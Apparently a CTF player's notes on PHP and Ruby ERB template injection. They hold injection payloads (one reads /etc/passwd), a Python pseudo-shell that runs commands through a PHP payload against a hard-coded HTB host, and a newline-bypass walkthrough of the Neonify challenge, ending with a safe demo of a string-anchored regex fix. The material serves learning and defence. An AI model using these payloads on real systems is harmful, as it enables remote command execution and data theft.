Command injection
Try the payloads listed in 'hacktricks' and 'payloadallthethings' first.
If nothing works:
${system($_GET[cmd])}&cmd=+ls >> this is PHP's curly "${expr}" string syntax: inside a double-quoted string PHP evaluates the expression to obtain a variable name, so system() runs as a side effect. It works when user input lands inside a string that PHP later evaluates as code (e.g. through eval()).
In the case above, I don't remember if it was an SSTI case.
In the case below, the code is an SSTI in Ruby:
<%= system('cat /etc/passwd') %> >> website that uses Ruby (ERB templates). <%= %> does not create a variable: it evaluates the Ruby expression inside the tag and writes its result into the rendered page, so system() runs on the server.
I need to study these things: PHP injection and Ruby injection by creating variables.
-----------------------------------------------------------------------------
python script:
import re
import readline  # imported only for its side effect: line editing/history in input()
import urllib.parse
import requests

URL = "http://167.71.142.156:32015"

# Pseudo-shell: each line typed is sent as the cmd parameter of the
# ${system($_GET[cmd])} payload and the command output is printed back.
while True:
    try:
        cmd = input("$ ")
    except (EOFError, KeyboardInterrupt):
        break
    cmd = urllib.parse.quote_plus(cmd)
    r = requests.get(URL + "/?format=${system($_GET[cmd])}&cmd=" + cmd)
    # system() output is echoed before the page body; drop the HTML that follows it
    text = re.sub(r'<html>.*', '', r.text, flags=re.DOTALL)
    print(text)
-----------------------------------------------------------------------------
It may also be worth trying a URL-encoded newline (%0a) in the parameter!
Something interesting I saw in the HTB Neonify challenge. The back-end code was this:
post '/' do
  if params[:neon] =~ /^[0-9a-z ]+$/i
    @neon = ERB.new(params[:neon]).result(binding)
  else
    @neon = "Malicious Input Detected"
  end
  erb :'index'
end
So the way to exploit it was to escape the regex check with a newline. Why? In Ruby, ^ and $ are line anchors, not string anchors, so a value like "hello\n<%= system('id') %>" (with the newline sent as %0a) satisfies /^[0-9a-z ]+$/i because its first line matches, and the whole string, second line included, is then handed to ERB.new(...).result, which executes the tag. The anchors:
^  Matches the beginning of a line.
$  Matches the end of a line.
\A Matches the beginning of the string.
\z Matches the end of the string.
\Z Matches the end of the string unless the string ends with a "\n", in which case it matches just before the "\n".
So, use \A and lowercase \z. If you use \Z someone could sneak in a newline character. This is not dangerous, I think, but it might screw up algorithms that assume there is no whitespace in the string. Depending on your regex and string-length constraints someone could use an invisible name with just a newline character.
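Added example (my own code, not the Neonify challenge's): the challenge's line-anchored check next to a hardened string-anchored one, run against a constructed benign input and a constructed newline payload. The template tag computes 7*7 instead of calling system() so it is safe to run; the bypass mechanics are the same.

```ruby
require 'erb'
require 'cgi'

# Constructed inputs (not from the challenge): one benign value and one that
# hides an ERB tag behind a newline. 7*7 stands in for system(...).
BENIGN  = "hello world"
PAYLOAD = "hello\n<%= 7*7 %>"

LINE_ANCHORED   = /^[0-9a-z ]+$/i    # Neonify's regex: ^ and $ match per LINE
STRING_ANCHORED = /\A[0-9a-z ]+\z/i  # fixed: \A and \z must cover the WHOLE string
TRAILING_NL_OK  = /\A[0-9a-z ]+\Z/i  # \Z still lets a single trailing "\n" through

def passes?(regex, input)
  !(input =~ regex).nil?
end

# Mirrors the challenge's handler: render the input with ERB if the regex accepts it.
def render_if_allowed(regex, input)
  passes?(regex, input) ? ERB.new(input).result(binding) : "Malicious Input Detected"
end

def vulnerable_filter(input)
  render_if_allowed(LINE_ANCHORED, input)
end

def hardened_filter(input)
  render_if_allowed(STRING_ANCHORED, input)
end

# How the payload travels in the POST body: the newline becomes %0A.
def encoded_payload
  CGI.escape(PAYLOAD)
end

if __FILE__ == $0
  puts "vulnerable: #{vulnerable_filter(PAYLOAD).inspect}"  # "hello\n49": the ERB tag ran
  puts "hardened:   #{hardened_filter(PAYLOAD).inspect}"    # "Malicious Input Detected"
  puts "\\Z accepts a trailing newline: #{passes?(TRAILING_NL_OK, "hello\n")}"
  puts "wire form: #{encoded_payload}"
end
```

The first line of PAYLOAD alone satisfies the line-anchored regex, so ERB receives and evaluates the second line; with \A...\z the same input is rejected, and the \Z variant shows the trailing-newline gap mentioned above.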